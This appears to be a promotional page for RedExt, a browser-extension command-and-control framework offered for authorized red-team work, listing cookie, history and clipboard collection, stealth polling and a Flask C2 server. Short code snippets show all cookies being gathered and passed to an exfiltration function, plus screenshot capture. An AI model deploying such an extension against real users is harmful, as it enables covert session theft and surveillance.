RedExt Browser Extension
C2 Framework
A powerful browser extension-based Command & Control framework for authorized
red team operations and security assessments.
Core Capabilities
Comprehensive browser-based reconnaissance and data collection capabilities for security assessments.
Browser Data Collection
Secure extraction of cookies, history, bookmarks, and local storage data with advanced filtering capabilities
Stealth Operations
Dynamic command polling with randomized intervals and robust error handling for reliable operations
Advanced C2 Server
Flask-based command & control server with SQLite backend for efficient agent management and data handling
Visual Intelligence
Screenshot capture, DOM snapshots, and clipboard monitoring for comprehensive situational awareness
Technical Architecture
Browser Extension
- • Background service worker for persistent operations
- • Content script injection for DOM interaction
- • Secure communication with C2 server
- • Built with Chrome Extension Manifest V3
C2 Infrastructure
- • Flask-based RESTful API endpoints
- • SQLite database for data persistence
- • Real-time agent management dashboard
- • Flexible command scheduling system
Implementation Examples
Cookie Extraction
const cookies = await chrome.cookies.getAll({});
exfilData('COOKIES', {
domain: 'all',
cookies: groupByDomain(cookies)
});
Data Collection
Browser State Analysis
DOM Snapshot
await captureScreenshot(quality);
broadcastMessage({
command: 'domSnapshot'
});
Visual Intelligence
Real-time Monitoring